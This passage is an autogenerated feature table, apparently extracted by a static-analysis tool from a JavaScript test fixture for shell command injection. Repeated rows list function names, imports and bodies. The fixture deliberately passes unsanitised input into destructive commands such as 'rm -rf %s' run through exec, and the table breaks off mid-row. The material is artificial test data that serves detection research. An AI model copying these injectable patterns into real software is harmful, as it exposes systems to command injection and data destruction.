autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | calleeImports | printf | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:28:108:38 | 'rm -rf %s' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | calleeImports | printf | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:41:108:44 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:20 | module.exports.valid | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:20 | module.exports.valid | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:111:20 | module.exports.valid | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:118:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:118:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:1:118:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:8:111:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:8:111:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:8:111:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:16:111:20 | valid | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:16:111:20 | valid | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:16:111:20 | valid | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | cp | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | cp | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | this | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | this | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:111:23 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | 'arguments' object of anonymous function | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | exceptional return of anonymous function | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | functio ... // OK\\n} | assignedToPropName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | return of anonymous function | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:24:118:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 